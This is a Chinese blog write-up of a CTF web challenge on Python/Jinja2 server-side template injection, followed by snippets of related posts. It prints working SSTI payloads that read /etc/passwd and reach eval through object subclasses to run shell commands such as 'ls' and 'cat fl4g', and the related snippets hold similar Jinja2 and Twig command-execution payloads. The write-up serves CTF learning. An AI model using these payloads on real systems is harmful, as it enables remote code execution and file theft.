web python template injection_攻防世界WEB高手进阶之python_template_injection

最新推荐文章于 2024-04-01 22:10:58 发布
最新推荐文章于 2024-04-01 22:10:58 发布
阅读量114 收藏
点赞数
文章标签: web python template injection

python模板注入

看了一堆文章,也不是看的很明白,反而把题目做出来了

大概思路如下

简单探测

返回

说明服务器执行了{{}}里面这一段代码

利用{{ config.items() }}可以查看服务器的配置信息

读取passwd信息

{{ [].__class__.__base__.__subclasses__()[40]('/etc/passwd').read() }}

执行成功

Python3代码

执行下面这一段代码

{% for c in [].__class__.__base__.__subclasses__() %}

{% if c.__name__ == 'catch_warnings' %}

{% for b in c.__init__.__globals__.values() %}

{% if b.__class__ == {}.__class__ %} //遍历基类 找到eval函数

{% if 'eval' in b.keys() %} //找到了

{{ b['eval']('__import__("os").popen("ls").read()') }} //导入cmd 执行popen里的命令 read读出数据

{% endif %}

{% endif %}

{% endfor %}

{% endif %}

{% endfor %}

列出文件

修改一下命令

ls 改成cat fl4g,就可以读取flag了

{% for c in [].__class__.__base__.__subclasses__() %}

{% if c.__name__ == 'catch_warnings' %}

{% for b in c.__init__.__globals__.values() %}

{% if b.__class__ == {}.__class__ %} //遍历基类 找到eval函数

{% if 'eval' in b.keys() %} //找到了

{{ b['eval']('__import__("os").popen("cat fl4g").read()') }}

{% endif %}

{% endif %}

{% endfor %}

{% endif %}

{% endfor %}

Get flag成功

Flag: ctf{f22b6844-5169-4054-b2a0-d95b9361cb57}

说起来参考了这几位师傅的文章,链接如下

https://blog.csdn.net/iamsongyu/article/details/85861811

https://www.cnblogs.com/wfzWebSecuity/p/9415641.html

https://xz.aliyun.com/t/2908

weixin_39705193
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
攻防世界--WEB进阶--Web_python_template_injection
m0_46267075的博客
05-28 1145
好难啊
Web_python_template_injection_攻防世界
u014794949
11-06 250
提示python模板注入,7*7变成49,确定存在模板注入 {{''.__class__.__mro__[2].__subclasses__()}} 构造payload {{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].listdir('.')}} {{''.__class__.__mro__[2].__subclasses__()[40]('fl4g').read()}} 魔术方法 __cl
攻防世界-web-Web_python_template_injection
wuh2333的博客
06-16 2313
攻防世界python模板注入
攻防世界Web_python_template_injection
2302_79800344的博客
04-01 919
【代码】【攻防世界Web_python_template_injection
Web_python_template_injectionPython模块注入)
Welcome To Myon'Blog !
04-11 1369
Python的模块注入 flask/jinja2 常用于ssti的魔术方法 获取基类的几种方法 获取基本类的子类 采用os模块的listdir函数来读取目录 常用payload
攻防世界-web Web_python_template_injection
m0_48108919的博客
02-11 3334
提示python模板注入 随便输入个/test目录查看,提示not found,并且把我们的输入test进行了输出,可以尝试在这个位置进行注入 1.判断模板引擎: 找到收藏已久的模板注入图 首先从${7*7}开始测试:并没有执行 继续测试{{7*7}}:执行成功,输出了49 因为Twig是php的模板,所有可以确定模板为Jinja2 2.直接百度搜索Jinja2模板注入漏洞 参考:https://blog.csdn.net/qq_36374896/arti...
攻防世界Web_python_template_injection
MIGENGKING的博客
04-23 3501
打开题目: 题目提示为Python模块注入: 1首先判断一下: 网址输入“{{7+7}}”页面显示14,说面存在“SSTI” : SSTI也是获取了一个输入,然后再后端的渲染处理上进行了语句的拼接,然后执行。当然还是和sql注入有所不同的,SSTI利用的是现在的网站模板引擎(下面会提到),主要针对python、php、java的一些网站处理框架,比如Python的jinja...
web_scan_code.zip_python_sql injection_sql注入_web scan_webscan
07-15
实现对网页的试错,判断后台数据库类型以及是否存在SQL注入的可能
cps-python.rar_WEBDRIVER PYTHON_python_python web_python web_py
09-21
标题中的“cps-python.rar_WEBDRIVER PYTHON_python_python web_python web_py”暗示了这是一个关于使用Python的Selenium WebDriver库来操作Web页面的教程或代码示例。描述中的“python webdriver登录web页面”...
webdriver_pythonweb_python_WEBDRIVERPYTHON_
10-03
运用python中的webdriver库学习自动化,示例为中国大学慕课MOOC+百度+CSDN自动登录程序。
web-introduction.rar_PYTHON语法_Python web 案例_js34666com_python
09-23
Python是一种高级编程语言,以其简洁明了的语法和强大的功能深受程序员喜爱,尤其在Web开发领域,Python的应用广泛且深入。本压缩包“web-introduction.rar”提供了关于PYTHON语法及Python Web开发的基础教程和案例...
Python高性能编程_python进阶_python高性能_
09-29
以下是一些关键的知识点,涵盖了Python进阶和高性能编程的核心概念。 1. **内存管理**:Python的动态类型系统虽然方便,但可能导致内存消耗增加。理解对象引用计数和垃圾回收机制,以及如何使用`__slots__`减少对象...
python_template_injection
Alita_lxz的博客
11-27 1275
python模板注入 Web_python_template_injection 文章内很多知识内容为转载大佬博客,都在文章开头处声明了文章原文地址 事情要从一道CTF的题目说起 打开题目,查看源代码,抓包, 扫目录,什么也没发现,只有页面上一行字,python template injection,这个之前也没有做过类似的题目,满脸问号,只得去找wp,通过大佬的wp学习了很多 题目大概这样做,先通过这条语句判断是否存在注入点 http://220.249.52.133:35728为我的题目地址 htt
攻防世界-Web_python_template_injection详解
Mr_helloword的博客
08-12 6900
Web_python_template_injection 在做这道题之前如果大家不懂可以先看一看这篇文章: 从零学习flask模板注入 基础知识: 在Jinja2模板引擎中,{{}}是变量包裹标识符。{{}}并不仅仅可以传递变量,还可以执行一些简单的表达式。 1.判断有无模板注入 payload http://220.249.52.133:53362/{{7+7}} 查看全局变量 http://220.249.52.133:53362/{{config}} 基础知识: 文件包含:是通过python
ssti详解与例题以及绕过payload大全
HoAd'blog
02-10 9449
ssti详解与例题以及绕过payload大全 [BJDCTF2020]Cookie is so stable user=1231{{2*4}} 判断是不是ssti user={{system('ls')}} 执行命令,但不能成功,,好像是空格不可以 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 这是最后的payload https://0day.work/jinja2
攻防世界web进阶Web_python_template_injection详解
hxhxhxhxx的博客
07-28 1642
攻防世界web进阶Web_python_template_injection详解题目详解python模板/框架Python中可以利用的方法和模块ssti常用注入,以及绕过姿势 题目 显而易见,根据题目的翻译 我们知道他是一个python的模板注入,ssti模板注入 详解 这里我们输入 http://220.249.52.133:55983/{{7+7}} 发现可以进行模板注入 这个题目和另外一个有点区别,tplmap并不能进行扫描 tplmap适用于有参数的一些模板注入 类对象并未发现 http:
ssti模板注入(入门级)Web_python_template_injection
qq_62046696的博客
05-29 707
Web_python_template_injection攻防世界进阶) 打开界面判断一下是否是ssti注入? 输入{{7*7}}执行成功得到49,说明存在ssti模板注入 __class__ 返回类型所属的对象 __mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。 __base__ 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的 __subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中
Arcmap天地图历史影像插件全国版-免费!免费!
最新发布
07-22
2024版“天地图”首次开放多时相影像专题,公众可查看32个省级天地图节点近半个世纪的历史影像;本arcmap插件集成了全国天地图历史影像接口,累计上千期。 免费使用。不收费!!不收费!!不收费!!
web python template injection_攻防世界-Web_python_template_injection详解
05-26
Web Python Template Injection 是一种常见的 Web 漏洞类型,通常缩写为 SSTI(Server Side Template Injection)。该漏洞是由于 Web 应用程序未正确处理用户输入导致的,攻击者可以通过构造恶意输入来执行任意代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值